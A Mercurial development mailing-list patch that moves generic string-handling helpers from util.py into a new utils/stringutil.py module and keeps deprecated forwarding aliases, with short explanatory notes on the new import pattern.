[PATCH 6 of 8] stringutil: move generic string helpers to new module
Yuya Nishihara
yuya at tcha.org
Thu Mar 22 15:01:57 UTC 2018
# HG changeset patch
# User Yuya Nishihara <yuya@tcha.org>
# Date 1521721171 -32400
# Thu Mar 22 21:19:31 2018 +0900
# Node ID 882b04a9062461a23585f3c36fa1440533addb28
# Parent 6ddd0155f4708dc1e099f0d3e8f1c668ba6419e4
stringutil: move generic string helpers to new module
Per https://phab.mercurial-scm.org/D2903#46738
URL and file path functions are left in place, since they are big enough to
warrant separate modules of their own.
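
For callers the change is mechanical: the helpers keep their names and move to
mercurial/utils/stringutil.py, while util.py grows forwarding aliases (see the
_deprecatedfunc block at the end of its diff). A minimal sketch of the
resulting import pattern, with made-up inputs (illustrative, not part of the
patch):

# old call sites keep working through the aliases left behind in util:
from mercurial import util
util.binary(b'\0blob')                                # -> True, NUL byte present

# new call sites import the relocated helpers directly:
from mercurial.utils import stringutil
stringutil.binary(b'\0blob')                          # -> True
stringutil.shortuser(b'Jane Doe <jane@example.com>')  # -> 'jane'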
diff --git a/mercurial/util.py b/mercurial/util.py
--- a/mercurial/util.py
+++ b/mercurial/util.py
@@ -17,7 +17,6 @@ from __future__ import absolute_import,
import abc
import bz2
-import codecs
import collections
import contextlib
import errno
@@ -37,7 +36,6 @@ import stat
import subprocess
import sys
import tempfile
-import textwrap
import time
import traceback
import warnings
@@ -52,7 +50,10 @@ from . import (
pycompat,
urllibcompat,
)
-from .utils import dateutil
+from .utils import (
+ dateutil,
+ stringutil,
+)
base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
@@ -808,20 +809,6 @@ class socketproxy(object):
return object.__getattribute__(self, r'_observedcall')(
r'setsockopt', *args, **kwargs)
-_DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
-_DATA_ESCAPE_MAP.update({
- b'\\': b'\\\\',
- b'\r': br'\r',
- b'\n': br'\n',
-})
-_DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
-
-def escapedata(s):
- if isinstance(s, bytearray):
- s = bytes(s)
-
- return _DATA_ESCAPE_RE.sub(lambda m: _DATA_ESCAPE_MAP[m.group(0)], s)
-
class baseproxyobserver(object):
def _writedata(self, data):
if not self.logdata:
@@ -1567,10 +1554,6 @@ def filter(s, cmd):
return fn(s, cmd[len(name):].lstrip())
return pipefilter(s, cmd)
-def binary(s):
- """return true if a string is binary data"""
- return bool(s and '\0' in s)
-
def increasingchunks(source, min=1024, max=65536):
'''return no less than min bytes per chunk while data remains,
doubling min after each chunk until it reaches max'''
@@ -2571,102 +2554,6 @@ class cappedreader(object):
b[0:len(res)] = res
return len(res)
-def stringmatcher(pattern, casesensitive=True):
- """
- accepts a string, possibly starting with 're:' or 'literal:' prefix.
- returns the matcher name, pattern, and matcher function.
- missing or unknown prefixes are treated as literal matches.
-
- helper for tests:
- >>> def test(pattern, *tests):
- ... kind, pattern, matcher = stringmatcher(pattern)
- ... return (kind, pattern, [bool(matcher(t)) for t in tests])
- >>> def itest(pattern, *tests):
- ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
- ... return (kind, pattern, [bool(matcher(t)) for t in tests])
-
- exact matching (no prefix):
- >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
- ('literal', 'abcdefg', [False, False, True])
-
- regex matching ('re:' prefix)
- >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
- ('re', 'a.+b', [False, False, True])
-
- force exact matches ('literal:' prefix)
- >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
- ('literal', 're:foobar', [False, True])
-
- unknown prefixes are ignored and treated as literals
- >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
- ('literal', 'foo:bar', [False, False, True])
-
- case insensitive regex matches
- >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
- ('re', 'A.+b', [False, False, True])
-
- case insensitive literal matches
- >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
- ('literal', 'ABCDEFG', [False, False, True])
- """
- if pattern.startswith('re:'):
- pattern = pattern[3:]
- try:
- flags = 0
- if not casesensitive:
- flags = remod.I
- regex = remod.compile(pattern, flags)
- except remod.error as e:
- raise error.ParseError(_('invalid regular expression: %s')
- % e)
- return 're', pattern, regex.search
- elif pattern.startswith('literal:'):
- pattern = pattern[8:]
-
- match = pattern.__eq__
-
- if not casesensitive:
- ipat = encoding.lower(pattern)
- match = lambda s: ipat == encoding.lower(s)
- return 'literal', pattern, match
-
-def shortuser(user):
- """Return a short representation of a user name or email address."""
- f = user.find('@')
- if f >= 0:
- user = user[:f]
- f = user.find('<')
- if f >= 0:
- user = user[f + 1:]
- f = user.find(' ')
- if f >= 0:
- user = user[:f]
- f = user.find('.')
- if f >= 0:
- user = user[:f]
- return user
-
-def emailuser(user):
- """Return the user portion of an email address."""
- f = user.find('@')
- if f >= 0:
- user = user[:f]
- f = user.find('<')
- if f >= 0:
- user = user[f + 1:]
- return user
-
-def email(author):
- '''get email of author.'''
- r = author.find('>')
- if r == -1:
- r = None
- return author[author.find('<') + 1:r]
-
-def ellipsis(text, maxlength=400):
- """Trim string to at most maxlength (default: 400) columns in display."""
- return encoding.trim(text, maxlength, ellipsis='...')
-
def unitcountfn(*unittable):
'''return a function that renders a readable count of some quantity'''
@@ -2751,147 +2638,6 @@ else:
fromnativeeol = pycompat.identity
nativeeolwriter = pycompat.identity
-def escapestr(s):
- # call underlying function of s.encode('string_escape') directly for
- # Python 3 compatibility
- return codecs.escape_encode(s)[0]
-
-def unescapestr(s):
- return codecs.escape_decode(s)[0]
-
-def forcebytestr(obj):
- """Portably format an arbitrary object (e.g. exception) into a byte
- string."""
- try:
- return pycompat.bytestr(obj)
- except UnicodeEncodeError:
- # non-ascii string, may be lossy
- return pycompat.bytestr(encoding.strtolocal(str(obj)))
-
-def uirepr(s):
- # Avoid double backslash in Windows path repr()
- return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
-
-# delay import of textwrap
-def _MBTextWrapper(**kwargs):
- class tw(textwrap.TextWrapper):
- """
- Extend TextWrapper for width-awareness.
-
- Neither number of 'bytes' in any encoding nor 'characters' is
- appropriate to calculate terminal columns for specified string.
-
- Original TextWrapper implementation uses built-in 'len()' directly,
- so overriding is needed to use width information of each characters.
-
- In addition, characters classified into 'ambiguous' width are
- treated as wide in East Asian area, but as narrow in other.
-
- This requires use decision to determine width of such characters.
- """
- def _cutdown(self, ucstr, space_left):
- l = 0
- colwidth = encoding.ucolwidth
- for i in xrange(len(ucstr)):
- l += colwidth(ucstr[i])
- if space_left < l:
- return (ucstr[:i], ucstr[i:])
- return ucstr, ''
-
- # overriding of base class
- def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
- space_left = max(width - cur_len, 1)
-
- if self.break_long_words:
- cut, res = self._cutdown(reversed_chunks[-1], space_left)
- cur_line.append(cut)
- reversed_chunks[-1] = res
- elif not cur_line:
- cur_line.append(reversed_chunks.pop())
-
- # this overriding code is imported from TextWrapper of Python 2.6
- # to calculate columns of string by 'encoding.ucolwidth()'
- def _wrap_chunks(self, chunks):
- colwidth = encoding.ucolwidth
-
- lines = []
- if self.width <= 0:
- raise ValueError("invalid width %r (must be > 0)" % self.width)
-
- # Arrange in reverse order so items can be efficiently popped
- # from a stack of chucks.
- chunks.reverse()
-
- while chunks:
-
- # Start the list of chunks that will make up the current line.
- # cur_len is just the length of all the chunks in cur_line.
- cur_line = []
- cur_len = 0
-
- # Figure out which static string will prefix this line.
- if lines:
- indent = self.subsequent_indent
- else:
- indent = self.initial_indent
-
- # Maximum width for this line.
- width = self.width - len(indent)
-
- # First chunk on line is whitespace -- drop it, unless this
- # is the very beginning of the text (i.e. no lines started yet).
- if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
- del chunks[-1]
-
- while chunks:
- l = colwidth(chunks[-1])
-
- # Can at least squeeze this chunk onto the current line.
- if cur_len + l <= width:
- cur_line.append(chunks.pop())
- cur_len += l
-
- # Nope, this line is full.
- else:
- break
-
- # The current line is full, and the next chunk is too big to
- # fit on *any* line (not just this one).
- if chunks and colwidth(chunks[-1]) > width:
- self._handle_long_word(chunks, cur_line, cur_len, width)
-
- # If the last chunk on this line is all whitespace, drop it.
- if (self.drop_whitespace and
- cur_line and cur_line[-1].strip() == r''):
- del cur_line[-1]
-
- # Convert current line back to a string and store it in list
- # of all lines (return value).
- if cur_line:
- lines.append(indent + r''.join(cur_line))
-
- return lines
-
- global _MBTextWrapper
- _MBTextWrapper = tw
- return tw(**kwargs)
-
-def wrap(line, width, initindent='', hangindent=''):
- maxindent = max(len(hangindent), len(initindent))
- if width <= maxindent:
- # adjust for weird terminal size
- width = max(78, maxindent + 1)
- line = line.decode(pycompat.sysstr(encoding.encoding),
- pycompat.sysstr(encoding.encodingmode))
- initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
- pycompat.sysstr(encoding.encodingmode))
- hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
- pycompat.sysstr(encoding.encodingmode))
- wrapper = _MBTextWrapper(width=width,
- initial_indent=initindent,
- subsequent_indent=hangindent)
- return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
-
if (pyplatform.python_implementation() == 'CPython' and
sys.version_info < (3, 0)):
# There is an issue in CPython that some IO methods do not handle EINTR
@@ -3064,17 +2810,6 @@ def getport(port):
except socket.error:
raise Abort(_("no port number associated with service '%s'") % port)
-_booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
- '0': False, 'no': False, 'false': False, 'off': False,
- 'never': False}
-
-def parsebool(s):
- """Parse s into a boolean.
-
- If s is not a valid boolean, returns None.
- """
- return _booleans.get(s.lower(), None)
-
class url(object):
r"""Reliable URL parser.
@@ -4341,3 +4076,19 @@ parsetimezone = _deprecatedfunc(dateutil
strdate = _deprecatedfunc(dateutil.strdate, '4.6')
parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
+
+def _deprecatedfunc(func, version): # TODO
+ return func
+escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
+binary = _deprecatedfunc(stringutil.binary, '4.6')
+stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
+shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
+emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
+email = _deprecatedfunc(stringutil.email, '4.6')
+ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
+escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
+unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
+forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
+uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
+wrap = _deprecatedfunc(stringutil.wrap, '4.6')
+parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
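
The _deprecatedfunc stub above is a placeholder that forwards calls unchanged;
the TODO suggests a real deprecation warning comes later. One possible shape
for the finished helper, reusing the nouideprecwarn() already defined in this
module (an assumption about a follow-up, not something this patch implements):

def _deprecatedfunc(func, version):
    # Hypothetical follow-up: warn on each call, then forward to the
    # relocated implementation in mercurial.utils.stringutil.
    def wrapped(*args, **kwargs):
        fn = pycompat.sysbytes(func.__name__)
        msg = "'util.%s' is deprecated, use 'stringutil.%s'" % (fn, fn)
        nouideprecwarn(msg, version, stacklevel=2)
        return func(*args, **kwargs)
    wrapped.__name__ = func.__name__
    return wrapped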
diff --git a/mercurial/util.py b/mercurial/utils/stringutil.py
copy from mercurial/util.py
copy to mercurial/utils/stringutil.py
--- a/mercurial/util.py
+++ b/mercurial/utils/stringutil.py
@@ -1,4 +1,4 @@
-# util.py - Mercurial utility functions and platform specific implementations
+# stringutil.py - utility for generic string formatting, parsing, etc.
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
@@ -7,806 +7,19 @@
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
-"""Mercurial utility functions and platform specific implementations.
+from __future__ import absolute_import
-This contains helper routines that are independent of the SCM core and
-hide platform-specific details from the core.
-"""
-
-from __future__ import absolute_import, print_function
-
-import abc
-import bz2
import codecs
-import collections
-import contextlib
-import errno
-import gc
-import hashlib
-import imp
-import io
-import itertools
-import mmap
-import os
-import platform as pyplatform
import re as remod
-import shutil
-import signal
-import socket
-import stat
-import subprocess
-import sys
-import tempfile
import textwrap
-import time
-import traceback
-import warnings
-import zlib
-from . import (
+from ..i18n import _
+
+from .. import (
encoding,
error,
- i18n,
- node as nodemod,
- policy,
pycompat,
- urllibcompat,
)
-from .utils import dateutil
-
-base85 = policy.importmod(r'base85')
-osutil = policy.importmod(r'osutil')
-parsers = policy.importmod(r'parsers')
-
-b85decode = base85.b85decode
-b85encode = base85.b85encode
-
-cookielib = pycompat.cookielib
-empty = pycompat.empty
-httplib = pycompat.httplib
-pickle = pycompat.pickle
-queue = pycompat.queue
-socketserver = pycompat.socketserver
-stderr = pycompat.stderr
-stdin = pycompat.stdin
-stdout = pycompat.stdout
-bytesio = pycompat.bytesio
-# TODO deprecate stringio name, as it is a lie on Python 3.
-stringio = bytesio
-xmlrpclib = pycompat.xmlrpclib
-
-httpserver = urllibcompat.httpserver
-urlerr = urllibcompat.urlerr
-urlreq = urllibcompat.urlreq
-
-# workaround for win32mbcs
-_filenamebytestr = pycompat.bytestr
-
-def isatty(fp):
- try:
- return fp.isatty()
- except AttributeError:
- return False
-
-# glibc determines buffering on first write to stdout - if we replace a TTY
-# destined stdout with a pipe destined stdout (e.g. pager), we want line
-# buffering
-if isatty(stdout):
- stdout = os.fdopen(stdout.fileno(), r'wb', 1)
-
-if pycompat.iswindows:
- from . import windows as platform
- stdout = platform.winstdout(stdout)
-else:
- from . import posix as platform
-
-_ = i18n._
-
-bindunixsocket = platform.bindunixsocket
-cachestat = platform.cachestat
-checkexec = platform.checkexec
-checklink = platform.checklink
-copymode = platform.copymode
-executablepath = platform.executablepath
-expandglobs = platform.expandglobs
-explainexit = platform.explainexit
-findexe = platform.findexe
-getfsmountpoint = platform.getfsmountpoint
-getfstype = platform.getfstype
-gethgcmd = platform.gethgcmd
-getuser = platform.getuser
-getpid = os.getpid
-groupmembers = platform.groupmembers
-groupname = platform.groupname
-hidewindow = platform.hidewindow
-isexec = platform.isexec
-isowner = platform.isowner
-listdir = osutil.listdir
-localpath = platform.localpath
-lookupreg = platform.lookupreg
-makedir = platform.makedir
-nlinks = platform.nlinks
-normpath = platform.normpath
-normcase = platform.normcase
-normcasespec = platform.normcasespec
-normcasefallback = platform.normcasefallback
-openhardlinks = platform.openhardlinks
-oslink = platform.oslink
-parsepatchoutput = platform.parsepatchoutput
-pconvert = platform.pconvert
-poll = platform.poll
-popen = platform.popen
-posixfile = platform.posixfile
-quotecommand = platform.quotecommand
-readpipe = platform.readpipe
-rename = platform.rename
-removedirs = platform.removedirs
-samedevice = platform.samedevice
-samefile = platform.samefile
-samestat = platform.samestat
-setbinary = platform.setbinary
-setflags = platform.setflags
-setsignalhandler = platform.setsignalhandler
-shellquote = platform.shellquote
-shellsplit = platform.shellsplit
-spawndetached = platform.spawndetached
-split = platform.split
-sshargs = platform.sshargs
-statfiles = getattr(osutil, 'statfiles', platform.statfiles)
-statisexec = platform.statisexec
-statislink = platform.statislink
-testpid = platform.testpid
-umask = platform.umask
-unlink = platform.unlink
-username = platform.username
-
-try:
- recvfds = osutil.recvfds
-except AttributeError:
- pass
-try:
- setprocname = osutil.setprocname
-except AttributeError:
- pass
-try:
- unblocksignal = osutil.unblocksignal
-except AttributeError:
- pass
-
-# Python compatibility
-
-_notset = object()
-
-def safehasattr(thing, attr):
- return getattr(thing, attr, _notset) is not _notset
-
-def _rapply(f, xs):
- if xs is None:
- # assume None means non-value of optional data
- return xs
- if isinstance(xs, (list, set, tuple)):
- return type(xs)(_rapply(f, x) for x in xs)
- if isinstance(xs, dict):
- return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
- return f(xs)
-
-def rapply(f, xs):
- """Apply function recursively to every item preserving the data structure
-
- >>> def f(x):
- ... return 'f(%s)' % x
- >>> rapply(f, None) is None
- True
- >>> rapply(f, 'a')
- 'f(a)'
- >>> rapply(f, {'a'}) == {'f(a)'}
- True
- >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
- ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
-
- >>> xs = [object()]
- >>> rapply(pycompat.identity, xs) is xs
- True
- """
- if f is pycompat.identity:
- # fast path mainly for py2
- return xs
- return _rapply(f, xs)
-
-def bitsfrom(container):
- bits = 0
- for bit in container:
- bits |= bit
- return bits
-
-# python 2.6 still have deprecation warning enabled by default. We do not want
-# to display anything to standard user so detect if we are running test and
-# only use python deprecation warning in this case.
-_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
-if _dowarn:
- # explicitly unfilter our warning for python 2.7
- #
- # The option of setting PYTHONWARNINGS in the test runner was investigated.
- # However, module name set through PYTHONWARNINGS was exactly matched, so
- # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
- # makes the whole PYTHONWARNINGS thing useless for our usecase.
- warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
- warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
- warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
-if _dowarn and pycompat.ispy3:
- # silence warning emitted by passing user string to re.sub()
- warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
- r'mercurial')
- warnings.filterwarnings(r'ignore', r'invalid escape sequence',
- DeprecationWarning, r'mercurial')
-
-def nouideprecwarn(msg, version, stacklevel=1):
- """Issue an python native deprecation warning
-
- This is a noop outside of tests, use 'ui.deprecwarn' when possible.
- """
- if _dowarn:
- msg += ("\n(compatibility will be dropped after Mercurial-%s,"
- " update your code.)") % version
- warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
-
-DIGESTS = {
- 'md5': hashlib.md5,
- 'sha1': hashlib.sha1,
- 'sha512': hashlib.sha512,
-}
-# List of digest types from strongest to weakest
-DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
-
-for k in DIGESTS_BY_STRENGTH:
- assert k in DIGESTS
-
-class digester(object):
- """helper to compute digests.
-
- This helper can be used to compute one or more digests given their name.
-
- >>> d = digester([b'md5', b'sha1'])
- >>> d.update(b'foo')
- >>> [k for k in sorted(d)]
- ['md5', 'sha1']
- >>> d[b'md5']
- 'acbd18db4cc2f85cedef654fccc4a4d8'
- >>> d[b'sha1']
- '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
- >>> digester.preferred([b'md5', b'sha1'])
- 'sha1'
- """
-
- def __init__(self, digests, s=''):
- self._hashes = {}
- for k in digests:
- if k not in DIGESTS:
- raise Abort(_('unknown digest type: %s') % k)
- self._hashes[k] = DIGESTS[k]()
- if s:
- self.update(s)
-
- def update(self, data):
- for h in self._hashes.values():
- h.update(data)
-
- def __getitem__(self, key):
- if key not in DIGESTS:
- raise Abort(_('unknown digest type: %s') % k)
- return nodemod.hex(self._hashes[key].digest())
-
- def __iter__(self):
- return iter(self._hashes)
-
- @staticmethod
- def preferred(supported):
- """returns the strongest digest type in both supported and DIGESTS."""
-
- for k in DIGESTS_BY_STRENGTH:
- if k in supported:
- return k
- return None
-
-class digestchecker(object):
- """file handle wrapper that additionally checks content against a given
- size and digests.
-
- d = digestchecker(fh, size, {'md5': '...'})
-
- When multiple digests are given, all of them are validated.
- """
-
- def __init__(self, fh, size, digests):
- self._fh = fh
- self._size = size
- self._got = 0
- self._digests = dict(digests)
- self._digester = digester(self._digests.keys())
-
- def read(self, length=-1):
- content = self._fh.read(length)
- self._digester.update(content)
- self._got += len(content)
- return content
-
- def validate(self):
- if self._size != self._got:
- raise Abort(_('size mismatch: expected %d, got %d') %
- (self._size, self._got))
- for k, v in self._digests.items():
- if v != self._digester[k]:
- # i18n: first parameter is a digest name
- raise Abort(_('%s mismatch: expected %s, got %s') %
- (k, v, self._digester[k]))
-
-try:
- buffer = buffer
-except NameError:
- def buffer(sliceable, offset=0, length=None):
- if length is not None:
- return memoryview(sliceable)[offset:offset + length]
- return memoryview(sliceable)[offset:]
-
-closefds = pycompat.isposix
-
-_chunksize = 4096
-
-class bufferedinputpipe(object):
- """a manually buffered input pipe
-
- Python will not let us use buffered IO and lazy reading with 'polling' at
- the same time. We cannot probe the buffer state and select will not detect
- that data are ready to read if they are already buffered.
-
- This class let us work around that by implementing its own buffering
- (allowing efficient readline) while offering a way to know if the buffer is
- empty from the output (allowing collaboration of the buffer with polling).
-
- This class lives in the 'util' module because it makes use of the 'os'
- module from the python stdlib.
- """
- def __new__(cls, fh):
- # If we receive a fileobjectproxy, we need to use a variation of this
- # class that notifies observers about activity.
- if isinstance(fh, fileobjectproxy):
- cls = observedbufferedinputpipe
-
- return super(bufferedinputpipe, cls).__new__(cls)
-
- def __init__(self, input):
- self._input = input
- self._buffer = []
- self._eof = False
- self._lenbuf = 0
-
- @property
- def hasbuffer(self):
- """True is any data is currently buffered
-
- This will be used externally a pre-step for polling IO. If there is
- already data then no polling should be set in place."""
- return bool(self._buffer)
-
- @property
- def closed(self):
- return self._input.closed
-
- def fileno(self):
- return self._input.fileno()
-
- def close(self):
- return self._input.close()
-
- def read(self, size):
- while (not self._eof) and (self._lenbuf < size):
- self._fillbuffer()
- return self._frombuffer(size)
-
- def readline(self, *args, **kwargs):
- if 1 < len(self._buffer):
- # this should not happen because both read and readline end with a
- # _frombuffer call that collapse it.
- self._buffer = [''.join(self._buffer)]
- self._lenbuf = len(self._buffer[0])
- lfi = -1
- if self._buffer:
- lfi = self._buffer[-1].find('\n')
- while (not self._eof) and lfi < 0:
- self._fillbuffer()
- if self._buffer:
- lfi = self._buffer[-1].find('\n')
- size = lfi + 1
- if lfi < 0: # end of file
- size = self._lenbuf
- elif 1 < len(self._buffer):
- # we need to take previous chunks into account
- size += self._lenbuf - len(self._buffer[-1])
- return self._frombuffer(size)
-
- def _frombuffer(self, size):
- """return at most 'size' data from the buffer
-
- The data are removed from the buffer."""
- if size == 0 or not self._buffer:
- return ''
- buf = self._buffer[0]
- if 1 < len(self._buffer):
- buf = ''.join(self._buffer)
-
- data = buf[:size]
- buf = buf[len(data):]
- if buf:
- self._buffer = [buf]
- self._lenbuf = len(buf)
- else:
- self._buffer = []
- self._lenbuf = 0
- return data
-
- def _fillbuffer(self):
- """read data to the buffer"""
- data = os.read(self._input.fileno(), _chunksize)
- if not data:
- self._eof = True
- else:
- self._lenbuf += len(data)
- self._buffer.append(data)
-
- return data
-
-def mmapread(fp):
- try:
- fd = getattr(fp, 'fileno', lambda: fp)()
- return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
- except ValueError:
- # Empty files cannot be mmapped, but mmapread should still work. Check
- # if the file is empty, and if so, return an empty buffer.
- if os.fstat(fd).st_size == 0:
- return ''
- raise
-
-def popen2(cmd, env=None, newlines=False):
- # Setting bufsize to -1 lets the system decide the buffer size.
- # The default for bufsize is 0, meaning unbuffered. This leads to
- # poor performance on Mac OS X: http://bugs.python.org/issue4194
- p = subprocess.Popen(cmd, shell=True, bufsize=-1,
- close_fds=closefds,
- stdin=subprocess.PIPE, stdout=subprocess.PIPE,
- universal_newlines=newlines,
- env=env)
- return p.stdin, p.stdout
-
-def popen3(cmd, env=None, newlines=False):
- stdin, stdout, stderr, p = popen4(cmd, env, newlines)
- return stdin, stdout, stderr
-
-def popen4(cmd, env=None, newlines=False, bufsize=-1):
- p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
- close_fds=closefds,
- stdin=subprocess.PIPE, stdout=subprocess.PIPE,
- stderr=subprocess.PIPE,
- universal_newlines=newlines,
- env=env)
- return p.stdin, p.stdout, p.stderr, p
-
-class fileobjectproxy(object):
- """A proxy around file objects that tells a watcher when events occur.
-
- This type is intended to only be used for testing purposes. Think hard
- before using it in important code.
- """
- __slots__ = (
- r'_orig',
- r'_observer',
- )
-
- def __init__(self, fh, observer):
- object.__setattr__(self, r'_orig', fh)
- object.__setattr__(self, r'_observer', observer)
-
- def __getattribute__(self, name):
- ours = {
- r'_observer',
-
- # IOBase
- r'close',
- # closed if a property
- r'fileno',
- r'flush',
- r'isatty',
- r'readable',
- r'readline',
- r'readlines',
- r'seek',
- r'seekable',
- r'tell',
- r'truncate',
- r'writable',
- r'writelines',
- # RawIOBase
- r'read',
- r'readall',
- r'readinto',
- r'write',
- # BufferedIOBase
- # raw is a property
- r'detach',
- # read defined above
- r'read1',
- # readinto defined above
- # write defined above
- }
-
- # We only observe some methods.
- if name in ours:
- return object.__getattribute__(self, name)
-
- return getattr(object.__getattribute__(self, r'_orig'), name)
-
- def __nonzero__(self):
- return bool(object.__getattribute__(self, r'_orig'))
-
- __bool__ = __nonzero__
-
- def __delattr__(self, name):
- return delattr(object.__getattribute__(self, r'_orig'), name)
-
- def __setattr__(self, name, value):
- return setattr(object.__getattribute__(self, r'_orig'), name, value)
-
- def __iter__(self):
- return object.__getattribute__(self, r'_orig').__iter__()
-
- def _observedcall(self, name, *args, **kwargs):
- # Call the original object.
- orig = object.__getattribute__(self, r'_orig')
- res = getattr(orig, name)(*args, **kwargs)
-
- # Call a method on the observer of the same name with arguments
- # so it can react, log, etc.
- observer = object.__getattribute__(self, r'_observer')
- fn = getattr(observer, name, None)
- if fn:
- fn(res, *args, **kwargs)
-
- return res
-
- def close(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'close', *args, **kwargs)
-
- def fileno(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'fileno', *args, **kwargs)
-
- def flush(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'flush', *args, **kwargs)
-
- def isatty(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'isatty', *args, **kwargs)
-
- def readable(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'readable', *args, **kwargs)
-
- def readline(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'readline', *args, **kwargs)
-
- def readlines(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'readlines', *args, **kwargs)
-
- def seek(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'seek', *args, **kwargs)
-
- def seekable(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'seekable', *args, **kwargs)
-
- def tell(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'tell', *args, **kwargs)
-
- def truncate(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'truncate', *args, **kwargs)
-
- def writable(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'writable', *args, **kwargs)
-
- def writelines(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'writelines', *args, **kwargs)
-
- def read(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'read', *args, **kwargs)
-
- def readall(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'readall', *args, **kwargs)
-
- def readinto(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'readinto', *args, **kwargs)
-
- def write(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'write', *args, **kwargs)
-
- def detach(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'detach', *args, **kwargs)
-
- def read1(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'read1', *args, **kwargs)
-
-class observedbufferedinputpipe(bufferedinputpipe):
- """A variation of bufferedinputpipe that is aware of fileobjectproxy.
-
- ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
- bypass ``fileobjectproxy``. Because of this, we need to make
- ``bufferedinputpipe`` aware of these operations.
-
- This variation of ``bufferedinputpipe`` can notify observers about
- ``os.read()`` events. It also re-publishes other events, such as
- ``read()`` and ``readline()``.
- """
- def _fillbuffer(self):
- res = super(observedbufferedinputpipe, self)._fillbuffer()
-
- fn = getattr(self._input._observer, r'osread', None)
- if fn:
- fn(res, _chunksize)
-
- return res
-
- # We use different observer methods because the operation isn't
- # performed on the actual file object but on us.
- def read(self, size):
- res = super(observedbufferedinputpipe, self).read(size)
-
- fn = getattr(self._input._observer, r'bufferedread', None)
- if fn:
- fn(res, size)
-
- return res
-
- def readline(self, *args, **kwargs):
- res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
-
- fn = getattr(self._input._observer, r'bufferedreadline', None)
- if fn:
- fn(res)
-
- return res
-
-PROXIED_SOCKET_METHODS = {
- r'makefile',
- r'recv',
- r'recvfrom',
- r'recvfrom_into',
- r'recv_into',
- r'send',
- r'sendall',
- r'sendto',
- r'setblocking',
- r'settimeout',
- r'gettimeout',
- r'setsockopt',
-}
-
-class socketproxy(object):
- """A proxy around a socket that tells a watcher when events occur.
-
- This is like ``fileobjectproxy`` except for sockets.
-
- This type is intended to only be used for testing purposes. Think hard
- before using it in important code.
- """
- __slots__ = (
- r'_orig',
- r'_observer',
- )
-
- def __init__(self, sock, observer):
- object.__setattr__(self, r'_orig', sock)
- object.__setattr__(self, r'_observer', observer)
-
- def __getattribute__(self, name):
- if name in PROXIED_SOCKET_METHODS:
- return object.__getattribute__(self, name)
-
- return getattr(object.__getattribute__(self, r'_orig'), name)
-
- def __delattr__(self, name):
- return delattr(object.__getattribute__(self, r'_orig'), name)
-
